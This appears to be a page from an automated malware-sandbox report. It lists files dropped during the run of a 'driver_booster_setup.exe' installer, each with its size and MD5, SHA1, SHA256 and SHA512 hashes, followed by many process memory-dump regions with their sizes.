700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlisho2t.vpb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

Filesize
27.6MB

MD5
ccc48304afa2e7c58492babc297db8a4

SHA1
decd98730cf34e1567965f6fb7085569fc1053e8

SHA256
e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910

SHA512
79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp

Filesize
1.2MB

MD5
68b52a0b8e3d45bf3b520a0e7f16dad1

SHA1
e50408326eafb5ca8adc70db29c33b64e25bbbbd

SHA256
b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b

SHA512
b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe

Filesize
5.8MB

MD5
3d403676517f6a99de035a04dc3f3f82

SHA1
ed69d8f485374dfb58a5b651b1f3f1bab8ee9541

SHA256
668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e

SHA512
4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp\EULA.rtf

Filesize
28KB

MD5
b0381f0ba7ead83ea3bd882c1de4cd48

SHA1
c740f811623061595d76fce2ebb4e69d34316f3b

SHA256
44bc9472169403484a0d384f1ca81989ef7e4b07441758e8a0110078933cbcb5

SHA512
6cfb8bc562d22843d043411720db97d0b4cbac96a20983d83d19e59b8428ec202f2532cc5af254438dc34fca4161abbd3f6bac8d397590e41b6d41e60700e78a

Download Submit
C:\Users\Admin\AppData\Local\Temp\lrucache.exe

Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
memory/64-472-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/64-475-0x00000207584C0000-0x00000207584EA000-memory.dmp

Filesize
168KB

Download
memory/64-466-0x00000207584C0000-0x00000207584EA000-memory.dmp

Filesize
168KB

Download
memory/616-453-0x000002DB3DA00000-0x000002DB3DA23000-memory.dmp

Filesize
140KB

Download
memory/616-456-0x000002DB3DA90000-0x000002DB3DABA000-memory.dmp

Filesize
168KB

Download
memory/616-459-0x00007FF8E99CD000-0x00007FF8E99CE000-memory.dmp

Filesize
4KB

Download
memory/668-462-0x000001DEC5010000-0x000001DEC503A000-memory.dmp

Filesize
168KB

Download
memory/668-460-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/668-465-0x00007FF8E99CD000-0x00007FF8E99CE000-memory.dmp

Filesize
4KB

Download
memory/668-458-0x000001DEC5010000-0x000001DEC503A000-memory.dmp

Filesize
168KB

Download
memory/668-468-0x00007FF8E99CF000-0x00007FF8E99D0000-memory.dmp

Filesize
4KB

Download
memory/732-477-0x0000020F8A4B0000-0x0000020F8A4DA000-memory.dmp

Filesize
168KB

Download
memory/732-482-0x0000020F8A4B0000-0x0000020F8A4DA000-memory.dmp

Filesize
168KB

Download
memory/732-479-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/960-467-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/960-464-0x000001BDF15D0000-0x000001BDF15FA000-memory.dmp

Filesize
168KB

Download
memory/960-470-0x000001BDF15D0000-0x000001BDF15FA000-memory.dmp

Filesize
168KB

Download
memory/960-471-0x00007FF8E99CC000-0x00007FF8E99CD000-memory.dmp

Filesize
4KB

Download
memory/1052-483-0x00000195A2560000-0x00000195A258A000-memory.dmp

Filesize
168KB

Download
memory/1052-486-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1080-442-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1080-432-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1080-433-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1080-440-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp

Filesize
760KB

Download
memory/1080-434-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1080-437-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

Filesize
2.0MB

Download
memory/1096-84-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1096-262-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1116-491-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1116-489-0x000002800E4A0000-0x000002800E4CA000-memory.dmp

Filesize
168KB

Download
memory/1144-497-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1144-494-0x000001CFAC6A0000-0x000001CFAC6CA000-memory.dmp

Filesize
168KB

Download
memory/1160-430-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

Filesize
2.0MB

Download
memory/1160-429-0x000002C77A060000-0x000002C77A0A0000-memory.dmp

Filesize
256KB

Download
memory/1160-411-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/1160-407-0x000002C777C90000-0x000002C777CA0000-memory.dmp

Filesize
64KB

Download
memory/1160-438-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/1160-410-0x000002C777C90000-0x000002C777CA0000-memory.dmp

Filesize
64KB

Download
memory/1160-431-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp

Filesize
760KB

Download
memory/1168-504-0x000002443D8F0000-0x000002443D91A000-memory.dmp

Filesize
168KB

Download
memory/1168-496-0x000002443D8F0000-0x000002443D91A000-memory.dmp

Filesize
168KB

Download
memory/1168-499-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1176-507-0x000001CF99060000-0x000001CF9908A000-memory.dmp

Filesize
168KB

Download
memory/1176-503-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1176-500-0x000001CF99060000-0x000001CF9908A000-memory.dmp

Filesize
168KB

Download
memory/1276-505-0x000001CB35530000-0x000001CB3555A000-memory.dmp

Filesize
168KB

Download
memory/1276-508-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

Filesize
64KB

Download
memory/1276-512-0x000001CB35530000-0x000001CB3555A000-memory.dmp

Filesize
168KB

Download
memory/1748-182-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/1748-260-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/3040-192-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/3040-208-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/3040-474-0x0000028205760000-0x0000028205770000-memory.dmp

Filesize
64KB

Download
memory/3040-473-0x0000028205760000-0x0000028205770000-memory.dmp

Filesize
64KB

Download
memory/3040-195-0x000001CFFD960000-0x000001CFFD982000-memory.dmp

Filesize
136KB

Download
memory/3040-193-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp

Filesize
64KB

Download
memory/3040-194-0x000001CFFDA30000-0x000001CFFDA40000-memory.dmp

Filesize
64KB

Download
memory/3040-452-0x00007FF8CAF00000-0x00007FF8CB9C1000-memory.dmp

Filesize
10.8MB

Download
memory/3184-340-0x0000000002680000-0x0000000002690000-memory.dmp

Filesize
64KB

Download
memory/3184-263-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/3184-441-0x0000000002680000-0x0000000002690000-memory.dmp

Filesize
64KB

Download
memory/3184-426-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/3184-439-0x0000000000400000-0x0000000000A17000-memory.dmp

Filesize
6.1MB

Download
memory/3608-447-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/3608-186-0x000000001CB70000-0x000000001CE0A000-memory.dmp

Filesize
2.6MB

Download
memory/3608-181-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/3608-169-0x00000000009E0000-0x0000000000C94000-memory.dmp

Filesize
2.7MB

Download
memory/3608-364-0x0000000001B60000-0x0000000001B66000-memory.dmp

Filesize
24KB

Download
memory/3608-363-0x0000000001B80000-0x0000000001B92000-memory.dmp

Filesize
72KB

Download
memory/3608-369-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/3608-395-0x0000000001B70000-0x0000000001B80000-memory.dmp

Filesize
64KB

Download
memory/3608-187-0x0000000001B70000-0x0000000001B80000-memory.dmp

Filesize
64KB

Download
memory/3940-374-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3940-365-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3940-366-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3940-367-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3940-380-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3952-0-0x0000000000400000-0x00000000022FF000-memory.dmp

Filesize
31.0MB

Download
memory/4780-445-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/4780-391-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

Filesize
10.8MB

Download
memory/4780-424-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

Filesize
64KB

Download
memory/4780-393-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

Filesize
64KB

Download
memory/4780-392-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

Filesize
64KB

Download
memory/5080-427-0x0000000004E00000-0x0000000004E1E000-memory.dmp

Filesize
120KB

Download
memory/5080-396-0x0000000003890000-0x00000000038C6000-memory.dmp

Filesize
216KB

Download
memory/5080-409-0x0000000003880000-0x0000000003890000-memory.dmp

Filesize
64KB

Download
memory/5080-428-0x0000000004E40000-0x0000000004E8C000-memory.dmp

Filesize
304KB

Download
memory/5080-408-0x0000000003F00000-0x0000000004528000-memory.dmp

Filesize
6.2MB

Download
memory/5080-397-0x0000000072110000-0x00000000728C0000-memory.dmp

Filesize
7.7MB

Download
memory/5080-425-0x0000000004940000-0x0000000004C94000-memory.dmp

Filesize
3.3MB

Download
memory/5080-485-0x0000000072110000-0x00000000728C0000-memory.dmp

Filesize
7.7MB

Download
memory/5080-511-0x0000000003880000-0x0000000003890000-memory.dmp

Filesize
64KB

Download
memory/5080-510-0x0000000003880000-0x0000000003890000-memory.dmp

Filesize
64KB

Download
memory/5080-413-0x0000000004760000-0x00000000047C6000-memory.dmp

Filesize
408KB

Download
memory/5080-414-0x00000000047D0000-0x0000000004836000-memory.dmp

Filesize
408KB

Download
memory/5080-412-0x0000000003E70000-0x0000000003E92000-memory.dmp

Filesize
136KB

Download